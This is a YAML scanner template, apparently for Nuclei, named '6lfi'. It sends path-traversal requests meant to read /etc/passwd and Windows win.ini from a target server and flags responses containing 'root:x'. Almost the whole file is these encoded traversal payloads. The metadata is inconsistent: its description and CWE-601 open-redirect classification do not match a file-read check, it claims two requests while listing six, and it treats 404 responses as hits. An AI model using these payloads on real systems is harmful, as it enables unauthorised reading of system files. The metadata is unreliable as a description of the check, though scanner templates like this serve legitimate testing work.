http:
- matchers:
  - part: body
    type: word
    words:
    - root:x
    - '[mci extensions]'
  - status:
    - 200
    - 404
    type: status
  matchers-condition: and
  method: GET
  path:
  - '{{BaseURL}}/%255c%255c%255c%255c%255c%255c..%255c..%255c..%255c..%255c..%255c..%255c/Windows/win.ini'
  - '{{BaseURL}}/%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd'
  - '{{BaseURL}}/file:%2f%2f/etc/passwd'
  - '{{BaseURL}}:8080/../../../../../../../../../etc/passwd'
  - '{{BaseURL}}:8081/../../../../../../../../../etc/passwd'
  - '{{BaseURL}}..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'
id: 6lfi-70
info:
  author: xandsz
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  description: 'Verifica parametros ocultos que refletem dentro do HTML da pagina

    '
  metadata:
    max-request: 2
  name: 6lfi
  severity: medium
  tags: fuzzer, generic
